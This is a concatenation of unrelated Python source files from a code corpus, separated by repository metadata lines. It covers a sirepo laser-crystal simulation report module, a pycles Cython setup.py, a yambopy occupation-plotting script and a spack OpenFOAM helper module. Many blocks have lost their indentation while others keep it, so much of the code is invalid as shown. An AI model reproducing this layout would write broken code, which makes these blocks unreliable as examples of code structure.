frame_args.id,
frame_args.frameIndex,
)
with h5py.File(filename, 'r') as f:
wfr = f['wfr']
points = np.array(wfr)
return PKDict(
title='S={}m (E={} eV)'.format(
_format_float(wfr.attrs['pos']),
frame_args.sim_in.models.gaussianBeam.photonEnergy,
),
subtitle='',
x_range=[wfr.attrs['xStart'], wfr.attrs['xFin'], len(points[0])],
x_label='Horizontal Position [m]',
y_range=[wfr.attrs['yStart'], wfr.attrs['yFin'], len(points)],
y_label='Vertical Position [m]',
z_matrix=points.tolist(),
summaryData=_summary_data(frame_args),
)
def sim_frame_crystal3dAnimation(frame_args):
# Load the precomputed 3d mesh (vertices/indices) and per-vertex
# intensity saved by the crystal run.
intensity = np.load('intensity.npy')
return PKDict(
title=' ',
indices=np.load('indices.npy').flatten().tolist(),
vertices=np.load('vertices.npy').flatten().tolist(),
intensity=intensity.tolist(),
intensity_range=[np.min(intensity), np.max(intensity)],
)
# The four pulse reports plot row 1 (RMS x) or row 3 (intensity) of the
# laser pulse arrays saved before or after propagation.
def sim_frame_laserPulse1Animation(frame_args):
return _laser_pulse_report(1, _INITIAL_LASER_FILE, 'Before Propagation', 'RMS x [m]')
def sim_frame_laserPulse2Animation(frame_args):
return _laser_pulse_report(3, _INITIAL_LASER_FILE, 'Before Propagation', 'Pulse Intensity')
def sim_frame_laserPulse3Animation(frame_args):
return _laser_pulse_report(1, _FINAL_LASER_FILE, 'After Propagation', 'RMS x [m]')
def sim_frame_laserPulse4Animation(frame_args):
return _laser_pulse_report(3, _FINAL_LASER_FILE, 'After Propagation', 'Pulse Intensity')
# Crystal temperature profiles along x and z (axis values scaled cm -> m).
def sim_frame_plotAnimation(frame_args):
return _crystal_plot(frame_args, 'xv', 'ux', '[m]', 1e-2)
def sim_frame_plot2Animation(frame_args):
return _crystal_plot(frame_args, 'zv', 'uz', '[m]', 1e-2)
def sim_frame_wavefrontSummaryAnimation(frame_args):
# Plot sx/sy wavefront dimensions along the cavity, either for all
# elements or restricted to one selected element id.
beamline = frame_args.sim_in.models.beamline
if 'element' not in frame_args:
frame_args.element = 'all'
idx = 0
title = ''
if frame_args.element != 'all':
# find the element index from the element id
for item in beamline:
if item.id == int(frame_args.element):
title = item.title
break
idx += 1
#TODO(pjm): use column headings from csv
cols = ['count', 'pos', 'sx', 'sy', 'xavg', 'yavg']
v = np.genfromtxt(str(frame_args.run_dir.join(_SUMMARY_CSV_FILE)), delimiter=',', skip_header=1)
if frame_args.element != 'all':
# the wavefront csv include intermediate values, so take every other row
counts = _counts_for_beamline(int((v[-1][0] + 1) / 2), beamline)[1]
v2 = []
for row in counts[idx]:
v2.append(v[(row - 1) * 2])
v = np.array(v2)
#TODO(pjm): generalize, use template_common parameter_plot()?
plots = []
for col in ('sx', 'sy'):
plots.append(PKDict(
points=v[:, cols.index(col)].tolist(),
label=f'{col} [m]',
))
x = v[:, cols.index('pos')].tolist()
return PKDict(
aspectRatio=1 / 5.0,
title='{} Wavefront Dimensions'.format(title),
x_range=[float(min(x)), float(max(x))],
y_label='',
x_label='s [m]',
x_points=x,
plots=plots,
y_range=template_common.compute_plot_color_and_range(plots),
summaryData=_summary_data(frame_args),
)
def stateless_compute_compute_rms_size(data):
# API entry point; delegates to the local RMS-size computation.
return _compute_rms_size(data)
def write_parameters(data, run_dir, is_parallel):
# Generate the python input file for the selected report into run_dir.
pkio.write_text(
run_dir.join(template_common.PARAMETERS_PYTHON_FILE),
_generate_parameters_file(data),
)
def _compute_rms_size(data):
    """Estimate the RMS transverse size of the cavity's Gaussian mode.

    The crystal is treated as an optical slab of index n0 when computing
    the effective cavity length; beta0 is the beta function at the waist
    and the RMS size is sqrt(lambda * beta0 / (4 pi)).
    """
    photon_energy = data.gaussianBeam.photonEnergy
    n0 = data.crystal.refractionIndex
    crystal_length = data.crystal.width * 1e-2  # cm -> m
    focusing_error = data.mirror.focusingError
    cavity_length = data.simulationSettings.cavity_length
    effective_length = cavity_length + (1 / n0 - 1) * crystal_length
    beta0 = math.sqrt(
        effective_length * (cavity_length / 4 + focusing_error)
        - effective_length ** 2 / 4)
    wavelength = constants.c * constants.value('Planck constant in eV/Hz') / photon_energy
    return PKDict(
        rmsSize=math.sqrt(wavelength * beta0 / 4 / math.pi)
    )
def _counts_for_beamline(total_frames, beamline):
# start at 2nd element, loop forward and backward across beamline
counts = [0 for _ in beamline]
idx = 1
direction = 1
frames = [[] for _ in beamline]
for i in range(total_frames):
counts[idx] += 1
frames[idx].append(i + 1)
idx += direction
if idx < 0 or idx > len(counts) - 1:
direction *= -1
idx += 2 * direction
return counts, frames
def _crystal_plot(frame_args, x_column, y_column, x_heading, scale):
# Build a temperature-vs-position plot from crystal.csv: the x_column
# row holds the axis points (scaled), each y_column row is one profile
# labeled by its simulation time.
x = None
plots = []
with open(str(frame_args.run_dir.join(_CRYSTAL_CSV_FILE))) as f:
for r in csv.reader(f):
if x is None and r[0] == x_column:
# first two cells are the row name and time; rest are values
r.pop(0)
r.pop(0)
x = [float(v) * scale for v in r]
elif r[0] == y_column:
r.pop(0)
t = r.pop(0)
plots.append(PKDict(
points=[float(v) for v in r],
label='{:.1f} sec'.format(float(t)),
))
return PKDict(
title='',
x_range=[min(x), max(x)],
y_label='Temperature [°C]',
x_label=x_heading,
x_points=x,
plots=plots,
y_range=template_common.compute_plot_color_and_range(plots),
summaryData=_summary_data(frame_args),
)
def _format_float(v):
return float('{:.4f}'.format(v))
def _generate_parameters_file(data):
# Render the python input for either the RT run (animation) or the
# crystal heat run (crystalAnimation) from the jinja templates.
if data.report == 'animation':
beamline = data.models.beamline
data.models.crystal = _get_crystal(data)
res, v = template_common.generate_parameters_file(data)
# first/last beamline elements are the cavity mirrors
v.leftMirrorFocusingError = beamline[0].focusingError
v.rightMirrorFocusingError = beamline[-1].focusingError
v.summaryCSV = _SUMMARY_CSV_FILE
v.initialLaserFile = _INITIAL_LASER_FILE
v.finalLaserFile = _FINAL_LASER_FILE
return res + template_common.render_jinja(SIM_TYPE, v)
if data.report == 'crystalAnimation':
res, v = template_common.generate_parameters_file(data)
v.crystalCSV = _CRYSTAL_CSV_FILE
return res + template_common.render_jinja(SIM_TYPE, v, 'crystal.py')
assert False, 'invalid param report: {}'.format(data.report)
def _get_crystal(data):
return data.models.beamline[1]
def _laser_pulse_report(value_index, filename, title, label):
# Plot one row of the saved pulse array against row 0 (the s axis).
values = np.load(filename)
return template_common.parameter_plot(
values[0].tolist(),
[
PKDict(
points=values[value_index].tolist(),
label=label,
),
],
PKDict(),
PKDict(
title=title,
y_label='',
x_label='s [m]',
),
)
def _parse_silas_log(run_dir):
# Collect '*** Error: ...' lines from the run log into a user-facing
# message; a mesh-boundary failure gets a friendlier explanation.
res = ''
path = run_dir.join(template_common.RUN_LOG)
if not path.exists():
return res
with pkio.open_text(str(path)) as f:
for line in f:
m = re.search(r'^\s*\*+\s+Error:\s+(.*)$', line)
if m:
err = m.group(1)
if re.search('Unable to evaluate function at point', err):
return 'Point evaulated outside of mesh boundary. Consider increasing Mesh Density or Boundary Tolerance.'
res += err + '\n'
if res:
return res
return 'An unknown error occurred'
def _summary_data(frame_args):
# Extra data attached to every report; beamline[1] is the crystal.
return PKDict(
crystalWidth=frame_args.sim_in.models.beamline[1].width,
)
def _total_frame_count(data):
return data.models.simulationSettings.n_reflections * 2 * (len(data.models.beamline) - 1) + 1
def _wavefront_filename_for_index(sim_in, item_id, frame):
# Map (beamline element id, per-element frame index) to the global
# wavefront dump file wfrNNNNN.h5 via the bounce schedule.
idx = 0
beamline = sim_in.models.beamline
for item in beamline:
if str(item_id) == str(item.id):
break
idx += 1
total_count = _total_frame_count(sim_in)
counts = _counts_for_beamline(total_count, beamline)[1]
counts = counts[idx]
file_index = counts[frame]
return f'wfr{file_index:05d}.h5'
| mkeilman/sirepo | sirepo/template/silas.py | Python | apache-2.0 | 11,600 | [
"CRYSTAL"
] | f72f762ca571c8497c07321ff6fbeacbfaae36deed5482dacdff760e08d17cef |
from distutils.core import setup
from Cython.Build import cythonize
from distutils.extension import Extension
import numpy as np
import mpi4py as mpi4py
import sys
import platform
import subprocess as sp
import os.path
import string
# Now get include paths from relevant python modules
include_path = [mpi4py.get_include()]
include_path += [np.get_include()]
include_path += ['./Csrc']
def get_netcdf_include():
    """Return the netCDF include directory reported by ``nc-config``."""
    raw = sp.check_output(['nc-config', '--includedir'])
    return raw.decode().strip()
def get_netcdf_prefix():
    """Return the netCDF install prefix reported by ``nc-config``."""
    raw = sp.check_output(['nc-config', '--prefix'])
    return raw.decode().strip()
# Per-host build configuration: each branch sets the compiler flags,
# library search paths and netCDF locations for a known environment.
if sys.platform == 'darwin':
#Compile flags for MacOSX
library_dirs = []
libraries = []
extensions = []
extra_compile_args = []
extra_compile_args += ['-O3', '-march=native', '-Wno-unused', '-Wno-#warnings','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = get_netcdf_include()
netcdf_lib = os.path.join(get_netcdf_prefix(), 'lib')
f_compiler = 'gfortran'
elif 'eu' in platform.node():
#Compile flags for euler @ ETHZ
library_dirs = ['/cluster/apps/openmpi/1.6.5/x86_64/gcc_4.8.2/lib/']
libraries = []
libraries.append('mpi')
libraries.append('gfortran')
extensions = []
extra_compile_args=[]
extra_compile_args+=['-std=c99', '-O3', '-march=native', '-Wno-unused',
'-Wno-#warnings', '-Wno-maybe-uninitialized', '-Wno-cpp', '-Wno-array-bounds','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = '/cluster/apps/netcdf/4.3.1/x86_64/gcc_4.8.2/openmpi_1.6.5/include'
netcdf_lib = '/cluster/apps/netcdf/4.3.1/x86_64/gcc_4.8.2/openmpi_1.6.5/lib'
f_compiler = 'gfortran'
elif (platform.machine() == 'x86_64') and ('LD_LIBRARY_PATH' in os.environ):
#Compile flags for Central @ Caltech
library_dirs = os.environ['LD_LIBRARY_PATH'].split(':')
libraries = []
libraries.append('mpi')
libraries.append('gfortran')
extensions = []
extra_compile_args=[]
extra_compile_args+=['-std=c99', '-O3', '-march=native', '-Wno-unused',
'-Wno-#warnings', '-Wno-maybe-uninitialized', '-Wno-cpp', '-Wno-array-bounds','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = '/central/software/netcdf-c/4.6.1/include'
netcdf_lib = '/central/software/netcdf-c/4.6.1/lib'
# Comment the above two lines and uncomment below to use Fram@Caltech)
#netcdf_include = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/include'
#netcdf_lib = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/lib'
f_compiler = 'gfortran'
else:
if platform.system()=='Linux':
#Best guess at compile flags for a Linux computer
library_dirs = os.environ['PATH'].split(':')
libraries = []
libraries.append('mpi')
libraries.append('gfortran')
extensions = []
extra_compile_args=[]
extra_compile_args+=['-std=c99', '-O3', '-march=native', '-Wno-unused',
'-Wno-#warnings', '-Wno-maybe-uninitialized', '-Wno-cpp', '-Wno-array-bounds','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/include'
netcdf_lib = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/lib'
f_compiler = 'gfortran'
else:
print('Unknown system platform: ' + sys.platform + 'or unknown system name: ' + platform.node())
sys.exit()
# ---------------------------------------------------------------------------
# Cython extension modules.
#
# Every module is built with the identical include paths, compile flags and
# link settings, so instead of repeating the Extension() call ~40 times we
# list the module names (one per .pyx file, in the original build order) and
# create the extensions in a loop.  'Radiation' is the single special case:
# it additionally links the pre-built RRTMG object file.
# ---------------------------------------------------------------------------
_pyx_module_names = [
    'Grid', 'Initialization', 'Microphysics', 'Microphysics_Arctic_1M',
    'thermodynamic_functions', 'Thermodynamics', 'ThermodynamicsDry',
    'ThermodynamicsSA', 'ReferenceState', 'Simulation3d', 'ParallelMPI',
    'PrognosticVariables', 'DiagnosticVariables', 'ScalarAdvection',
    'MomentumAdvection', 'ScalarDiffusion', 'MomentumDiffusion',
    'FluxDivergence', 'PressureSolver', 'PressureFFTSerial',
    'PressureFFTParallel', 'SparseSolvers', 'SGS', 'TimeStepping',
    'Kinematics', 'Lookup', 'NetCDFIO', 'Surface', 'SurfaceBudget',
    'Damping', 'Forcing', 'entropies', 'Radiation', 'AuxiliaryStatistics',
    'ConditionalStatistics', 'Tracers', 'Restart', 'VisualizationOutput',
]
for _name in _pyx_module_names:
    # only Radiation links the RRTMG object file
    _extra = {'extra_objects': extra_objects} if _name == 'Radiation' else {}
    extensions.append(
        Extension(_name, [_name + '.pyx'], include_dirs=include_path,
                  extra_compile_args=extra_compile_args, libraries=libraries,
                  library_dirs=library_dirs, runtime_library_dirs=library_dirs,
                  **_extra))
#Build RRTMG
rrtmg_compiled = os.path.exists('./RRTMG/rrtmg_build/rrtmg_combined.o')
if not rrtmg_compiled:
run_str = 'cd ./RRTMG; '
run_str += ('FC='+ f_compiler + ' LIB_NETCDF=' + netcdf_lib + ' INC_NETCDF='+
netcdf_include + ' csh ./compile_RRTMG_combined.csh')
print(run_str)
sp.call([run_str], shell=True)
else:
print("RRTMG Seems to be already compiled.")
setup(
ext_modules=cythonize(extensions, verbose=1, include_path=include_path)
)
| pressel/pycles | setup.py | Python | gpl-3.0 | 14,188 | [
"NetCDF"
] | 5ba63f45798cfe627dceaa4860a83f73edc167dd94713c91fdcfbb3a3b6f66bd |
# This script reads the carrier database
# and displays it along a path in histogram form
# along with a representation of the carriers in energy space
from __future__ import print_function
from __future__ import division
from builtins import range
from past.utils import old_div
from yambopy import *  # also expected to provide np and plt used below -- TODO confirm
import matplotlib.gridspec as gridspec
from scipy.optimize import curve_fit
import os
############
# SETTINGS #
############
folder = 'rt-24x24'
calc = 'QSSIN-D-100.0fs-2.07eV-300K-DG'  # Where RT carrier output is
# High-symmetry path in reduced coordinates (Gamma - M - K - Gamma)
path = [[0.0,0.0,0.0],[0.5,0.0,0.0],[0.33333,0.33333,0.0],[0.0,0.0,0.0]]
nbv = 2 ; nbc = 2  # nb of valence and conduction bands
########
# INIT #
########
# For saving pictures
os.system('mkdir -p occupations_v2/%s/%s'%(folder,calc))
# Instance containing bandstructure (as used in RT sim) and occupations
yrt = YamboRTDB(folder=folder,calc=calc)
yrt.get_path(path)  # Generates kindex and distances
### aliases
times = [i * 1e15 for i in yrt.times]  # carriers output times, converted s -> fs
nbands = yrt.nbands  # number of bands in the RT simulation
# Sanity check: the script's band split must match the database.
if nbv+nbc != nbands:
    raise NameError('Incompatible number of bands, set nbv and nbc in script.')
## 'path-plot' variables
kindex = yrt.bands_indexes  # kpoint indexes (in order) to draw path
distances = yrt.bands_distances
eigenvalues = yrt.eigenvalues[kindex,:]  # eigenvalues of the bands included in the RT simulation
#
max_occ = np.amax(yrt.occupations[:,kindex,:])  # used to size the distribution plots
# Normalized occupations; format: time, kindex, band index (0..nbands, only on path)
occupations = old_div(yrt.occupations[:,kindex,:],max_occ)
#
##
## 'fit' variables and function
# FD distrib for fit
def fermi_dirac(E, a, T):  # declare E first so curve_fit fits (a, T)
    """Fermi-Dirac distribution 1 / (1 + exp((E - a) / T)).

    Parameters
    ----------
    E : float or ndarray
        Energy (eV); first positional so ``curve_fit`` treats it as the
        independent variable and fits ``a`` and ``T``.
    a : float
        Chemical potential (eV).
    T : float
        Temperature expressed in eV (i.e. kB*T).

    Returns
    -------
    float or ndarray in (0, 1).

    Note: uses true division instead of the Python-2 ``old_div`` shim,
    which silently floor-divided the exponent when all arguments were
    integers; floats (the curve_fit case) behave identically.
    """
    return 1.0 / (1.0 + np.exp((E - a) / T))
#
KtoeV = 8.61733e-5  # Boltzmann constant in eV/K (converts fitted T in eV to kelvin)
#
# xeng is an array of values to plot the fit properly
xeng = np.linspace(np.amin(eigenvalues[:,list(range(nbv))]), np.amax(eigenvalues[:,list(range(nbv,nbands))]),1000)
##
##############
# EXT. FIELD #
##############
# The external field is read from the o- file
ext = np.loadtxt('%s/%s/pulse/o-pulse.external_field'%(folder,calc))
field = old_div(ext[:,2],max(abs(ext[:,2])))  # polarization : x=1,y=2,z=3
##################
# ENERGY DISTRIB #
##################
# Sort the (n,k) pairs between positive and negative energies
# (If the same energy appears twice, it must not be summed over)
list_e=[] ; list_h=[]
for k in range(yrt.nkpoints):
    for n in range(yrt.nbands):
        e = yrt.eigenvalues[k,n]
        if e<=0.0:
            list_h.append((k,n))
        else:
            list_e.append((k,n))
# Map (k,n) to a single index for e and h
# then get the list of indices to sort the energies
nrj = np.zeros((len(list_e)))
for i,(k,n) in enumerate(list_e):
    nrj[i]=yrt.eigenvalues[k,n]
sorted_e = np.argsort(nrj)
nrj = np.zeros((len(list_h)))
for i,(k,n) in enumerate(list_h):
    nrj[i]=yrt.eigenvalues[k,n]
sorted_h = np.argsort(nrj)
# Build the occupation tables occ_x[t,(nk)_index,(e|occ)]
occ_e = np.zeros((len(times),len(list_e),2))
for t in range(len(times)):
    for i,(k,n) in enumerate(list_e):
        occ_e[t,i,0]=yrt.eigenvalues[k,n]
        occ_e[t,i,1]=yrt.occupations[t,k,n]
occ_h = np.zeros((len(times),len(list_h),2))
for t in range(len(times)):
    for i,(k,n) in enumerate(list_h):
        occ_h[t,i,0]=yrt.eigenvalues[k,n]
        occ_h[t,i,1]=yrt.occupations[t,k,n]
# Sorting (each time slice reordered by increasing energy)
for t in range(len(times)):
    occ_e[t,:,:]=occ_e[t,sorted_e,:]
    occ_h[t,:,:]=occ_h[t,sorted_h,:]
# *(-1) on holes to fit the same way as electrons
occ_h *= -1
#################
# BAR PLOT DATA #
#################
# Fill arrays with occupation of valence and conduction bands
# Recall that 'occupations' was normalized
# one entry per band
occ_v = np.zeros((len(times),len(kindex),nbv))
occ_c = np.zeros((len(times),len(kindex),nbc))
for n in range(nbv):
    occ_v[:,:,n] = -occupations[:,:,n]  # minus sign to get positive occupations
for n in range(nbc):
    occ_c[:,:,n] = occupations[:,:,n+nbv]  # +nbv to read CBs
####################
# TIME LOOP & PLOT #
####################
# Gridspec allows to place subplots on a grid
# spacing for example can be customised
gs = gridspec.GridSpec(9, 8)
# y range for band structure & energy plots
ymin_v= np.amin(eigenvalues[:,:nbv])-0.1
ymin_c= np.amin(eigenvalues[:,nbv:])-0.1
ymax_v= np.amax(eigenvalues[:,:nbv])+0.1
ymax_c= np.amax(eigenvalues[:,nbv:])+0.1
###
# One figure per output time; written to occupations_v2/<folder>/<calc>/<t>.png
for t in range(len(times)):
#for t in (30,):
    i=t
    print(times[i])
    name = 'occupations_v2/'+folder+'/'+calc+'/%d.png' % (times[t])
    fig = plt.figure()
    fig.suptitle('Occupation of the bands and fit to the Fermi-Dirac distribution',fontsize=14,ha='center')
    ####### bandstructure w/ occupation plot
    ax1c = plt.subplot(gs[0:4,0:-2])
    ax1v = plt.subplot(gs[4:8,0:-2])
    # remove x ticks
    ax1c.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax1v.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    # set x range
    ax1c.set_xlim((0,distances[-1]))
    ax1v.set_xlim((0,distances[-1]))
    # y range is defined with ax3 and ax4 (they share y axis with ax1)
    # Plot band structure
    ax1v.plot(distances,eigenvalues[:,:nbv],'k-',lw=2,zorder=0)
    ax1c.plot(distances,eigenvalues[:,nbv:],'k-',lw=2,zorder=0)
    # VB: marker area scales with (normalized) hole occupation
    for n in range(nbv):
        ax1v.scatter(distances,eigenvalues[:,n],s=400*occ_v[t,:,n],color='blue',alpha=0.5)
    # CB: marker area scales with (normalized) electron occupation
    for n in range(nbc):
        ax1c.scatter(distances,eigenvalues[:,nbv+n],s=400*occ_c[t,:,n],color='red',alpha=0.5)
    # text and labels
    fig.text(0.05,0.6,'Energy (eV)',size=16,rotation='vertical')
    fig.text(0.50,0.91, '%d fs'%times[t],size=16)
    ######## field plot
    ax2 = plt.subplot(gs[-1,:])
    # remove ticks and labels
    ax2.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax2.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')
    # text
    ax2.set_ylabel('Field')
    # frame size
    ax2.set_xlim((0,times[-1]))
    ax2.set_ylim((-1.3,1.3))
    # NOTE(review): slicing by int(times[t]) assumes the field file is
    # sampled at 1 row per fs -- confirm against o-pulse output spacing.
    ax2.plot(field[:int(times[t])])
    ## Plot of the occupation as a function of energy (rotated to match the band structure)
    ax3 = plt.subplot(gs[0:4,-2:],sharey=ax1c)
    ax4 = plt.subplot(gs[4:8,-2:],sharey=ax1v)
    # plot the data
    try:  # does not break if fit is not found
        fit,cov = curve_fit(fermi_dirac,occ_e[i,:,0],occ_e[i,:,1])
    except RuntimeError:
        fit=np.array([0,0])
    ax3.fill_betweenx(occ_e[i,:,0],0,occ_e[i,:,1],color='red')
    ax3.plot(fermi_dirac(xeng,fit[0],fit[1]),xeng,'k-')
    ax3.text(0.5,0.9,'Electrons\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax3.transAxes,ha='center',va='center')
    try:
        fit,cov = curve_fit(fermi_dirac,occ_h[i,:,0],occ_h[i,:,1])
    except RuntimeError:
        fit=np.array([0,0])
    ax4.fill_betweenx(-occ_h[i,:,0],0,occ_h[i,:,1],color='blue')
    ax4.plot(fermi_dirac(xeng,fit[0],fit[1]),-xeng,'k-')
    ax4.text(0.5,0.1,'Holes\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax4.transAxes,ha='center',va='center')
    # set x and y range
    ax4.set_xlim(-0.1*max_occ,1.1*max_occ)
    ax3.set_xlim(-0.1*max_occ,1.1*max_occ)
    ax3.set_ylim(( ymin_c,ymax_c ))
    ax4.set_ylim(( ymin_v,ymax_v ))
    # hide some ticks/labels
    ax3.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax3.tick_params(axis='y',labelleft='off',labelright='off')
    ax4.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
    ax4.tick_params(axis='y',labelleft='off',labelright='off')
    plt.savefig( name ,transparent=False,dpi=300)
    print(name)
    #plt.show()
    plt.close(fig)
| henriquemiranda/yambo-py | scripts/realtime/plot_occ2.py | Python | bsd-3-clause | 7,697 | [
"DIRAC"
] | b67e3f6b1be8891b7b9f8e8fa70d303b240a2e69341affc813b3ede175ca6716 |
##############################################################################
# Copyright (c) 2017-2018 Mark Olesen, OpenCFD Ltd.
#
# This file was authored by Mark Olesen <mark.olesen@esi-group.com>
# and is released as part of spack under the LGPL license.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for the LLNL notice and LGPL.
#
# License
# -------
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Legal Notice
# ------------
# OPENFOAM is a trademark owned by OpenCFD Ltd
# (producer and distributor of the OpenFOAM software via www.openfoam.com).
# The trademark information must remain visible and unadulterated in this
# file and via the "spack info" and comply with the term set by
# http://openfoam.com/legal/trademark-policy.php
#
# This file is not part of OpenFOAM, nor does it constitute a component of an
# OpenFOAM distribution.
#
##############################################################################
#
# Notes
# - mpi handling: WM_MPLIB=USERMPI and use spack to populate an appropriate
# configuration and generate wmake rules for 'USER' and 'USERMPI'
# mpi implementations.
#
# - Resolution of flex, zlib needs more attention (within OpenFOAM)
# - +paraview:
# depends_on should just be 'paraview+plugins' but that resolves poorly.
# Workaround: use preferred variants "+plugins +qt"
# packages:
# paraview:
# variants: +plugins +qt
# in ~/.spack/packages.yaml
#
# Known issues
# - Combining +zoltan with +int64 has not been tested, but probably won't work.
# - Combining +mgridgen with +int64 or +float32 probably won't work.
#
# The spack 'develop' version of openfoam-com retains the upstream
# WM_PROJECT_VERSION=plus naming internally.
#
##############################################################################
import glob
import re
import shutil
import os
from spack import *
from spack.environment import EnvironmentModifications
import llnl.util.tty as tty
# Not the nice way of doing things, but is a start for refactoring
# Public helpers shared with the other spack OpenFOAM packages.
__all__ = [
    'add_extra_files',
    'write_environ',
    'rewrite_environ_files',
    'mplib_content',
    'foamAddPath',
    'foamAddLib',
    'OpenfoamArch',
]
def add_extra_files(foam_pkg, common, local, **kwargs):
    """Copy additional files into the package's stage.source_path.

    The 'common' files come from the openfoam-com/common directory,
    the 'local' files from the package's own assets directory.
    """
    outdir = foam_pkg.stage.source_path
    sources = (
        (join_path(os.path.dirname(__file__), 'common'), common),
        (join_path(foam_pkg.package_dir, 'assets'), local),
    )
    for indir, file_list in sources:
        for f in file_list:
            tty.info('Added file {0}'.format(f))
            install(join_path(indir, f), join_path(outdir, f))
def format_export(key, value):
    """Render a key/value pair as a POSIX-shell 'export' line.

    A key starting with '#' turns the whole line into a comment;
    a value of None renders an 'unset' line instead.
    """
    if key.startswith('#'):
        bare_key = re.sub(r'^#+\s*', '', key)
        return '## export {0}={1}\n'.format(bare_key, value)
    if value is None:
        return 'unset {0}\n'.format(key)
    return 'export {0}={1}\n'.format(key, value)
def format_setenv(key, value):
    """Render a key/value pair as a C-shell 'setenv' line.

    A key starting with '#' turns the whole line into a comment;
    a value of None renders an 'unsetenv' line instead.
    """
    if key.startswith('#'):
        bare_key = re.sub(r'^#+\s*', '', key)
        return '## setenv {0} {1}\n'.format(bare_key, value)
    if value is None:
        return 'unsetenv {0}\n'.format(key)
    return 'setenv {0} {1}\n'.format(key, value)
def _write_environ_entries(outfile, environ, formatter):
"""Write environment settings as 'export' or 'setenv'.
If environ is a dict, write in sorted order.
If environ is a list, write pair-wise.
Also descends into sub-dict and sub-list, but drops the key.
"""
if isinstance(environ, dict):
for key in sorted(environ):
entry = environ[key]
if isinstance(entry, dict):
_write_environ_entries(outfile, entry, formatter)
elif isinstance(entry, list):
_write_environ_entries(outfile, entry, formatter)
else:
outfile.write(formatter(key, entry))
elif isinstance(environ, list):
for item in environ:
outfile.write(formatter(item[0], item[1]))
def _write_environ_file(output, environ, formatter):
    """Write environment settings, bracketed by spack marker comments.

    The entries themselves are emitted by _write_environ_entries
    (dict: sorted order; list: pair-wise; nested containers flattened).
    """
    header, footer = '# spack generated\n', '# spack\n'
    with open(output, 'w') as handle:
        handle.write(header)
        _write_environ_entries(handle, environ, formatter)
        handle.write(footer)
def write_environ(environ, **kwargs):
    """Write environment settings to POSIX and/or C-shell files.

    Keyword Options:
        posix[=None]   If set, the name of the POSIX file to write.
        cshell[=None]  If set, the name of the C-shell file to write.
    """
    for key, formatter in (('posix', format_export),
                           ('cshell', format_setenv)):
        rcfile = kwargs.get(key, None)
        if rcfile:
            _write_environ_file(rcfile, environ, formatter)
def rewrite_environ_files(environ, **kwargs):
    """Use filter_file to rewrite (existing) POSIX shell or C-shell files.

    For each key in 'environ': an empty value unsets the variable, a
    value starting with '#' unsets it with a trailing comment, anything
    else replaces the assigned value in place.

    Keyword Options:
        posix[=None]   If set, the name of the POSIX file to rewrite.
        cshell[=None]  If set, the name of the C-shell file to rewrite.
    """
    # (kwarg, assignment regex, unset form, commented-unset form, value form)
    shells = (
        ('posix',
         r'^(\s*export\s+{0})=.*$',
         r'unset {0} #SPACK: unset',
         r'unset {0} {1}',
         r'\1={0}'),
        ('cshell',
         r'^(\s*setenv\s+{0})\s+.*$',
         r'unsetenv {0} #SPACK: unset',
         r'unsetenv {0} {1}',
         r'\1 {0}'),
    )
    for kwname, regex_fmt, unset_fmt, comment_fmt, value_fmt in shells:
        rcfile = kwargs.get(kwname, None)
        if not (rcfile and os.path.isfile(rcfile)):
            continue
        for k, v in environ.items():
            regex = regex_fmt.format(k)
            if not v:
                replace = unset_fmt.format(k)
            elif v.startswith('#'):
                replace = comment_fmt.format(k, v)
            else:
                replace = value_fmt.format(v)
            filter_file(regex, replace, rcfile, backup=False)
def foamAddPath(*args):
    """A double-quoted string with args prepended to '${PATH}'."""
    return '"{0}:${{PATH}}"'.format(':'.join(args))
def foamAddLib(*args):
    """A double-quoted string with args prepended to '${LD_LIBRARY_PATH}'."""
    return '"{0}:${{LD_LIBRARY_PATH}}"'.format(':'.join(args))
def pkglib(package, pre=None):
    """Return lib64 (if it exists) or lib from the package prefix.

    With the optional 'pre' argument, graft the lib/lib64 basename onto
    that alternative prefix instead.
    """
    candidate = package.prefix.lib64
    libdir = candidate if os.path.isdir(candidate) else package.prefix.lib
    if pre:
        return join_path(pre, os.path.basename(libdir))
    return libdir
def mplib_content(spec, pre=None):
    """The mpi settings (from spack) for the OpenFOAM wmake includes,
    which allows later reuse within OpenFOAM.

    Optional parameter 'pre' substitutes an alternative prefix for the
    bin/include/lib locations (eg, a '${MPI_ARCH_PATH}' placeholder).
    """
    mpi_spec = spec['mpi']
    libname = 'mpich' if 'mpich' in mpi_spec.name else 'mpi'
    bin_dir = mpi_spec.prefix.bin
    inc_dir = mpi_spec.prefix.include
    lib_dir = pkglib(mpi_spec)
    if pre:
        bin_dir = join_path(pre, os.path.basename(bin_dir))
        inc_dir = join_path(pre, os.path.basename(inc_dir))
        lib_dir = join_path(pre, os.path.basename(lib_dir))
    else:
        pre = mpi_spec.prefix
    return {
        'name': '{0}-{1}'.format(mpi_spec.name, mpi_spec.version),
        'prefix': pre,
        'include': inc_dir,
        'bindir': bin_dir,
        'libdir': lib_dir,
